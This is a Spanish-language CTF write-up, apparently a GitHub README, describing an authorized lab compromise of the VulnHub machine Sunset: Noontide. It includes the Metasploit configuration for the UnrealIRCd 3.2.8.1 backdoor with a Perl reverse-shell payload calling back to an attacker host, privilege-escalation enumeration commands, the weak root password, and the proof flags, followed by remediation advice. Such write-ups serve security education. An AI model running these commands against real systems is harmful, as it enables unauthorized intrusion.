## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZALES2004-SUNSET-NOONTIDE-PENTESTING
# Sunset: Noontide — Pruebas de Penetración
Una evaluación profesional de pruebas de penetración y guía de CTF de **Sunset: Noontide** , una máquina intencionalmente vulnerable de **VulnHub**.
Este proyecto documenta el ciclo de vida completo de las pruebas de penetración, incluyendo reconocimiento, enumeración de servicios, investigación de vulnerabilidades, explotación, acceso inicial, post-explotación, escalada de privilegios, prueba de compromiso, evaluación de riesgos, mapeo de MITRE ATT&CK y remediación.
> ⚠️ **Descargo de responsabilidad:** Esta evaluación se realizó contra una máquina intencionalmente vulnerable en un entorno de laboratorio autorizado. Las técnicas y comandos documentados aquí están destinados únicamente a sistemas para los cuales se ha obtenido autorización explícita.
* * *
## 🎯 Objetivos
* Identificar el host objetivo
* Enumerar los servicios expuestos
* Identificar software y versiones vulnerables
* Investigar vulnerabilidades aplicables
* Explotar el servicio vulnerable
* Obtener acceso inicial a la shell
* Realizar enumeración de post-explotación en Linux
* Identificar oportunidades de escalada de privilegios
* Obtener acceso a nivel root
* Recuperar los archivos de prueba de usuario y root
* Documentar los hallazgos de seguridad
* Proporcionar recomendaciones de remediación
* * *
## 🖥️ Entorno de Laboratorio
Componente| Detalles
---|---
Objetivo| Sunset: Noontide
Plataforma| VulnHub
IP Objetivo| `10.106.186.186`
Nombre de Host Objetivo| `noontide`
SO Objetivo| Debian GNU/Linux 10 (Buster)
Arquitectura| x86_64
Plataforma Atacante| Kali Linux
IP Atacante| `10.106.186.204`
Tipo de Evaluación| Evaluación de Laboratorio Autorizada
Riesgo General| **CRÍTICO**
Resultado de la Evaluación| **Compromiso Total del Sistema**
* * *
## 🔐 Cadena de Ataque
**Descubrimiento del Objetivo → Enumeración con Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Explotación con Metasploit → Shell de Comandos Remota → Shell como`server` → Post-Explotación en Linux → Credencial Root Débil → `su root` → UID 0 / Acceso Root → Archivos de Prueba de Usuario y Root**
* * *
# 1\. Reconocimiento
Se realizó un descubrimiento de red inicial para identificar el objetivo vulnerable.
El objetivo fue finalmente identificado como:
`10.106.186.186`
Durante el reconocimiento, `10.106.186.142` fue identificado como la puerta de enlace predeterminada en lugar del objetivo previsto.
Esto resalta la importancia de identificar correctamente el objetivo antes de realizar pruebas de seguridad adicionales, particularmente en una red de laboratorio puenteada o compartida.
* * *
# 2\. Enumeración de Servicios
Se realizó la detección de servicios y versiones con Nmap contra el objetivo usando:
`nmap -sV 10.106.186.186`
El servicio expuesto significativo identificado durante la evaluación fue:
`6667/tcp open irc UnrealIRCd`
Luego se realizó un escaneo más detallado usando:
`nmap -sC -sV -Pn -p 6667 10.106.186.186`
El servicio fue identificado como:
`UnrealIRCd 3.2.8.1`
El servicio IRC también reportó:
`irc.foonet.com`
El servicio UnrealIRCd expuesto se convirtió en la superficie de ataque principal investigada durante la evaluación.
* * *
# 3\. Investigación de Vulnerabilidades
Se utilizó SearchSploit para investigar vulnerabilidades documentadas públicamente asociadas con la versión de UnrealIRCd descubierta.
Comando:
`searchsploit UnrealIRCd 3.2.8.1`
El resultado relevante fue:
`UnrealIRCd 3.2.8.1 - Backdoor Command Exec`
`linux/remote/16922.rb`
La vulnerabilidad fue identificada como:
**CVE-2010-2075**
### Vulnerabilidad
**Ejecución de Comandos por Backdoor en UnrealIRCd 3.2.8.1**
### Severidad
**Crítica**
### Tipo de Ataque
**Ejecución Remota de Comandos**
### Impacto de Seguridad
La explotación exitosa del servicio vulnerable permite a un atacante ejecutar comandos remotamente en el sistema objetivo.
* * *
# 4\. Explotación con Metasploit
El servicio IRC vulnerable fue explotado usando el Framework Metasploit.
El módulo seleccionado fue:
`exploit/unix/irc/unreal_ircd_3281_backdoor`
Configuración de ejemplo:
`use exploit/unix/irc/unreal_ircd_3281_backdoor`
`set RHOST 10.106.186.186`
Los intentos iniciales de payload no produjeron una sesión utilizable.
Posteriormente se seleccionó un payload compatible de Perl inverso para Unix:
`set payload cmd/unix/reverse_perl`
`set LHOST 10.106.186.204`
`set LPORT 4444`
`run`
Metasploit reportó que el objetivo parecía vulnerable y abrió exitosamente una sesión de shell de comandos.
* * *
# 5\. Acceso Inicial
La shell obtenida fue verificada usando:
`whoami`
Resultado:
`server`
Esto confirmó la ejecución remota de comandos exitosa como la cuenta `server`.
El directorio de trabajo inicial fue:
`/home/server/irc/Unreal3.2`
En esta etapa, la evaluación progresó desde la explotación remota del servicio hasta la enumeración local de post-explotación.
* * *
# 6\. Enumeración de Post-Explotación
Después de obtener la shell, se realizó la enumeración estándar de Linux para comprender el host comprometido e identificar posibles rutas de escalada de privilegios.
## Usuario Actual
Comando:
`id`
Resultado:
`uid=1000(server) gid=1000(server)`
La cuenta era un usuario no root.
## Nombre de Host
Comando:
`hostname`
Resultado:
`noontide`
## Información del Kernel
Comando:
`uname -a`
Resultado:
`Linux noontide 4.19.0-10-amd64 x86_64`
## Sistema Operativo
Comando:
`cat /etc/os-release`
Resultado:
`Debian GNU/Linux 10 (buster)`
Estos comandos establecieron la identidad actual, el nombre de host, la versión del kernel, el sistema operativo y la configuración general del sistema.
* * *
# 7\. Enumeración de Escalada de Privilegios
Se realizaron varias verificaciones estándar de escalada de privilegios en Linux.
## 7.1 Enumeración de SUID
Comando:
`find / -perm -4000 -type f 2>/dev/null`
Se identificaron binarios SUID estándar como `passwd`, `chsh`, `mount`, `umount`, `su`, `chfn`, `newgrp` y `gpasswd`.
No se identificó ningún binario SUID personalizado o anómalo obvio como el vector de escalada exitoso.
* * *
## 7.2 Enumeración de Sudo
Comando:
`sudo -l`
No se identificó ninguna ruta útil de escalada de privilegios basada en sudo a partir de la salida disponible.
* * *
## 7.3 Enumeración de Cron
Comandos:
`cat /etc/crontab`
`ls -la /etc/cron.d/`
`ls -la /etc/cron.hourly/`
`ls -la /etc/cron.daily/`
`ls -la /etc/cron.weekly/`
Los trabajos programados observados eran trabajos de sistema estándar al estilo Debian.
No se identificó ningún trabajo cron de root escribible obvio.
* * *
## 7.4 Enumeración de Archivos Escribibles
Comando:
`find / -writable -type f 2>/dev/null | head -100`
Los resultados iniciales fueron principalmente pseudo-archivos de `/proc` y no revelaron un vector práctico de escalada de privilegios.
* * *
## 7.5 Capacidades de Linux
Comando:
`getcap -r / 2>/dev/null`
No se identificó ninguna escalada de privilegios útil basada en capacidades a partir de la salida resultante.
* * *
# 8\. Escalada de Privilegios
La ruta exitosa de escalada de privilegios se basó en las credenciales root intencionalmente débiles configuradas en la máquina vulnerable.
Se accedió a la cuenta root usando:
`su root`
Contraseña:
`root`
El acceso root fue luego verificado usando:
`id`
Resultado:
`uid=0(root) gid=0(root) groups=0(root)`
La identidad también fue confirmada usando:
`whoami`
Resultado:
`root`
Esto confirmó el control administrativo completo del sistema objetivo.
* * *
# 9\. Prueba de Compromiso
## 9.1 Prueba a Nivel de Usuario
El archivo de prueba a nivel de usuario se encontraba en:
`/home/server/local.txt`
Comando:
`cat /home/server/local.txt`
Resultado:
`c53c08b5bf2b0801c5d0c24149826a6e`
* * *
## 9.2 Prueba a Nivel de Root
El archivo de prueba a nivel de root se encontraba en:
`/root/proof.txt`
Comando:
`cat /root/proof.txt`
Resultado:
`ab28c8ca8da1b9ffc2d702ac54221105`
La prueba de root también devolvió:
`Thanks for playing! - Felipe Winsnes (@whitecr0wz)`
La recuperación de ambos archivos de prueba confirma el compromiso exitoso desde el acceso remoto inicial hasta el control a nivel de root.
* * *
# 10\. Resumen de Riesgos
ID| Hallazgo| Severidad| Impacto
---|---|---|---
VULN-01| Backdoor en UnrealIRCd 3.2.8.1| 🔴 Crítica| Ejecución Remota de Comandos
VULN-02| Credenciales Root Débiles| 🔴 Crítica| Compromiso Administrativo Total
* * *
# 11\. Hallazgos Detallados
## VULN-01 — Backdoor en UnrealIRCd 3.2.8.1
**Severidad:** Crítica
**Servicio Afectado:** IRC / TCP 6667
**Software Afectado:** UnrealIRCd 3.2.8.1
**CVE:** CVE-2010-2075
**Tipo de Ataque:** Ejecución Remota de Comandos
**Impacto Observado:** Shell remota obtenida como `server`
### Descripción
El servicio UnrealIRCd expuesto estaba ejecutando una versión vulnerable asociada con una vulnerabilidad conocida de ejecución de comandos por backdoor.
La vulnerabilidad fue identificada mediante la enumeración de servicios y la investigación con SearchSploit y fue explotada exitosamente usando Metasploit.
### Impacto Empresarial
Un atacante capaz de alcanzar el servicio IRC vulnerable podría ejecutar comandos remotamente y obtener acceso no autorizado al host.
* * *
## VULN-02 — Credenciales Root Débiles
**Severidad:** Crítica
**Cuenta Afectada:** `root`
**Credencial Observada:** `root / root`
**Impacto Observado:** Acceso administrativo UID 0
### Descripción
La cuenta root estaba configurada con una credencial extremadamente débil.
Después de obtener una shell local como `server`, se accedió a la cuenta root usando la credencial débil y se verificó con UID 0.
### Impacto Empresarial
Un atacante que obtiene acceso a la shell local puede usar la credencial root débil para obtener el control completo del sistema operativo.
* * *
# 12\. Mapeo de MITRE ATT&CK
Técnica| ID| Actividad Observada
---|---|---
Network Service Scanning| T1046| Enumeración con Nmap
Exploit Public-Facing Application| T1190| Explotación del servicio UnrealIRCd expuesto
Command and Scripting Interpreter| T1059| Shell de comandos remota
Valid Accounts| T1078| Uso de credenciales root
Account Discovery| T1087| Enumeración de identidad y usuarios
System Information Discovery| T1082| `uname` y `/etc/os-release`
File and Directory Discovery| T1083| Enumeración del sistema de archivos
Scheduled Task/Job Discovery| T1053| Enumeración de cron
Permission Groups Discovery| T1069| `id` y enumeración de grupos
* * *
# 13\. Recomendaciones de Remediación
## 13.1 Eliminar o Actualizar UnrealIRCd
Reemplace la instalación vulnerable de UnrealIRCd con una versión confiable y soportada.
Verifique la integridad del software y la procedencia del paquete antes del despliegue.
## 13.2 Eliminar Software con Backdoor
Si la integridad o procedencia del software es incierta, reconstruya el sistema usando medios de instalación confiables y paquetes verificados.
## 13.3 Eliminar Credenciales Débiles
Reemplace las credenciales predeterminadas y débiles con credenciales administrativas fuertes y únicas.
No use contraseñas simples como `root`.
## 13.4 Restringir la Exposición de IRC
Si IRC es necesario, restrinja el acceso usando:
* Reglas de firewall
* Segmentación de red
* Acceso VPN
* Restricciones de IP de origen
## 13.5 Aplicar Actualizaciones de Seguridad
Mantenga un proceso documentado de gestión de parches para el sistema operativo y todos los servicios expuestos.
## 13.6 Monitorear el Acceso Privilegiado
Registre y revise:
* Autenticación administrativa
* Acceso root
* Cambios de privilegios
* Actividad de autenticación sospechosa
* * *
# 14\. Metodología de Pruebas de Penetración
Fase| Actividades
---|---
Reconocimiento| Descubrimiento de red e identificación del objetivo
Enumeración| Detección de servicios/versiones con Nmap
Investigación de Vulnerabilidades| Identificación de módulos con SearchSploit y Metasploit
Explotación| Explotación del backdoor de UnrealIRCd
Acceso Inicial| Shell de comandos como `server`
Post-Explotación| Enumeración de identidad, SO, sistema de archivos y privilegios
Escalada de Privilegios| Verificaciones de SUID, sudo, cron, archivos escribibles y capacidades
Recolección de Evidencia| Archivos de prueba de usuario y root
Reporte| Hallazgos, análisis de riesgos y remediación
* * *
# 15\. Herramientas Utilizadas
* **Nmap** — Descubrimiento de red y enumeración de servicios
* **SearchSploit** — Investigación de vulnerabilidades y exploits
* **Metasploit Framework** — Explotación y establecimiento de sesión
* **Utilidades de Línea de Comandos de Linux** — Post-explotación y enumeración de privilegios
* * *
# 16\. Habilidades Demostradas
* Reconocimiento de Red
* Descubrimiento de Hosts
* Escaneo de Puertos
* Enumeración de Servicios
* Identificación de Versiones
* Evaluación de Vulnerabilidades
* Investigación de CVE
* SearchSploit
* Metasploit Framework
* Ejecución Remota de Comandos
* Enumeración de Linux
* Enumeración de SUID
* Enumeración de Sudo
* Enumeración de Cron
* Enumeración de Archivos Escribibles
* Capacidades de Linux
* Evaluación de Seguridad de Credenciales
* Escalada de Privilegios
* Prueba de Compromiso
* Mapeo de MITRE ATT&CK
* Evaluación de Riesgos
* Reporte de Seguridad
* Análisis de Remediación
* * *
# 17\. Evaluación Final
El host **Sunset: Noontide** fue comprometido exitosamente desde el acceso de red inicial hasta el control completo a nivel de root.
La vulnerabilidad principal de acceso inicial fue el **backdoor de UnrealIRCd 3.2.8.1 (CVE-2010-2075)**.
La vulnerabilidad proporcionó ejecución remota de comandos y resultó en una shell inicial como la cuenta `server`.
Luego se realizó la enumeración de post-explotación, incluyendo verificaciones de SUID, sudo, cron, archivos escribibles, capacidades de Linux, identidad, sistema operativo y sistema de archivos.
Estas verificaciones no identificaron la ruta de escalada exitosa.
El acceso administrativo completo se logró finalmente a través de las credenciales root débiles de la máquina.
La recuperación exitosa de ambos archivos de prueba, a nivel de usuario y de root, confirmó el compromiso total del sistema.
### Evaluación General
**CRÍTICO — Compromiso Total del Sistema Logrado**
* * *
# 18\. Resultados de la Evaluación
Objetivo| Estado
---|---
Objetivo Identificado| ✅ PASS
Servicio Expuesto Identificado| ✅ PASS
Versión Vulnerable Identificada| ✅ PASS
CVE Identificado| ✅ PASS
Ejecución Remota de Comandos| ✅ PASS
Shell Inicial como `server`| ✅ PASS
Prueba de Usuario Recuperada| ✅ PASS
Escalada de Privilegios| ✅ PASS
Acceso Root Verificado| ✅ PASS
Prueba de Root Recuperada| ✅ PASS
* * *
# 19\. Informe Profesional de Pruebas de Penetración
Se incluye un informe detallado y profesional de pruebas de penetración con este proyecto:
**`Sunset-Noontide-Penetration-Testing-Report.pdf`**
El informe contiene:
* Resumen Ejecutivo
* Control de Documentos
* Alcance y Reglas de Compromiso
* Resumen de Riesgos
* Ruta de Ataque
* Reconocimiento
* Enumeración de Servicios
* Investigación de Vulnerabilidades
* Explotación con Metasploit
* Acceso Inicial
* Post-Explotación
* Escalada de Privilegios
* Evidencia y Archivos de Prueba
* Hallazgos Detallados
* Mapeo de MITRE ATT&CK
* Recomendaciones de Remediación
* Evaluación Final
* * *
# 20\. Evidencia
Estructura sugerida del repositorio:
`sunset-noontide-pentesting/`
`├── README.md`
`├── Sunset-Noontide-Penetration-Testing-Report.pdf`
`└── evidence/`
` ├── 01-target-discovery.png`
` ├── 02-nmap-enumeration.png`
` ├── 03-searchsploit.png`
` ├── 04-metasploit-exploitation.png`
` ├── 05-initial-shell.png`
` ├── 06-post-exploitation.png`
` ├── 07-privilege-escalation.png`
` └── 08-root-proof.png`
Las capturas de pantalla deben contener únicamente información del entorno de laboratorio autorizado.
* * *
# 21\. Lecciones Aprendidas
Esta evaluación proporcionó experiencia práctica en:
1. Identificar correctamente el objetivo previsto en un entorno de red.
2. Realizar enumeración de servicios y versiones con Nmap.
3. Investigar vulnerabilidades usando SearchSploit.
4. Seleccionar un módulo de exploit de Metasploit apropiado.
5. Solucionar problemas de compatibilidad de payloads.
6. Establecer una shell de comandos remota.
7. Realizar enumeración de post-explotación en Linux.
8. Verificar sistemáticamente vectores comunes de escalada de privilegios.
9. Identificar credenciales administrativas débiles.
10. Verificar el compromiso a nivel de root.
11. Recopilar evidencia de prueba de compromiso.
12. Documentar vulnerabilidades en un formato profesional de pruebas de penetración.
* * *
# 22\. ⚠️ Descargo de Responsabilidad Legal y Ético
Este repositorio está destinado estrictamente a:
* Educación en ciberseguridad
* Pruebas de penetración autorizadas
* Práctica de CTF
* Investigación de vulnerabilidades
* Entornos de laboratorio
Las técnicas documentadas en este repositorio deben realizarse únicamente contra sistemas para los cuales se ha obtenido autorización explícita.
No use estas técnicas contra sistemas de producción, infraestructura pública o sistemas de terceros sin permiso.
* * *
# 👨💻 Autor
**Alen Sales K S**
Ciberseguridad | Pruebas de Penetración | SOC | Seguridad de Redes
GitHub: https://github.com/zales2004
* * *
# ⭐ Resumen del Proyecto
**Sunset: Noontide** demuestra un flujo de trabajo completo de pruebas de penetración:
**Reconocimiento → Enumeración → Investigación de Vulnerabilidades → Explotación → Acceso Inicial → Post-Explotación → Escalada de Privilegios → Acceso Root → Recolección de Evidencia → Evaluación de Riesgos → Reporte de Seguridad**
**Resultado de la Evaluación: CRÍTICO — Compromiso Total del Sistema Logrado**